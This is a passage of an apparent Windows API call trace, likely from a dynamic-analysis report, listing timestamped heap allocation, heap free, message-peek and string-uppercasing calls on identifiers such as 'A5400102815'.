RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0190.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0190.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0190.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0190.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0190.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.734] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0190.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0190.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0190.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0190.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0190.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.735] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0190.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0190.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0190.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0190.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0190.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.735] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0190.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0190.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0190.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0190.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0190.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.736] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0190.736] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0190.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0190.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.736] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0190.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.737] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0190.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0190.737] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.737] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0190.737] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0190.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0190.738] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0190.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0190.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.738] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0190.738] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.738] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0190.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0190.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0190.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0190.740] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.740] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0190.740] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0190.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0190.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0190.740] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0190.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0190.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.740] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0190.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0190.741] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.741] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0190.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0190.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.742] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0190.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.742] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.742] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0190.742] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0190.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0190.742] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0190.742] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.743] RtlAllocateHeap 